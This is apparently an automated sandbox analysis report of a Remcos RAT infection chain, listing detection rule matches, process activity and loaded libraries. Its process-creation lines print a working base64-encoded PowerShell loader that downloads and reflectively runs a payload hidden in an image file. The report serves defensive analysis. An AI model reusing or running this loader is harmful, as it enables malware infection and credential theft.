                          Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winWSF@16/8@4/3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_004182CE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00416AB7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,11_2_00410DE1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,8_2_00418758
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,7_2_0040E219
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,7_2_0041A63F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_00419BC4
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-L31JDJ
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5o1paha.jgp.ps1Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: HandleInformationJump to behavior
                          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: MSBuild.exe, MSBuild.exe, 00000009.00000002.2064713491.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: MSBuild.exe, 00000008.00000002.2075083415.0000000002CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_DEC2024.wsf"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\psbaiipwgpfutbdtwagt"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rmosjaaquxxzehzxflbutck"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumarJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\psbaiipwgpfutbdtwagt"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rmosjaaquxxzehzxflbutck"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy"Jump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
